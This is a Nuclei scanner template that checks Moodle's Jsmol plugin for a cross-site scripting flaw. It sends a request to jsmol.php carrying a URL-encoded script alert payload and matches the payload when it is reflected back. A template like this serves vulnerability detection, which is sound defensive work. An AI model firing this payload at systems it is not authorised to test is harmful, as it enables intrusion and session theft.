id: moodle-filter-jmol-xss

info:
  name: Moodle Jsmol - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: moodle,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<script>alert('XSS')</script>"
        part: body

      - type: word
        part: header
        words:
          - "text/html"

# digest: 490a00463044022067d46714a7c304b093f0e54d285fdb1e32899bb25be8a81a4fca59c8b576defd02204ec73e474a2a7ca0f1a7acad1bb85e6a5cbba7099d41c6e2c9cc93baa7181780:922c64590222798bb761d5b6d8e72950
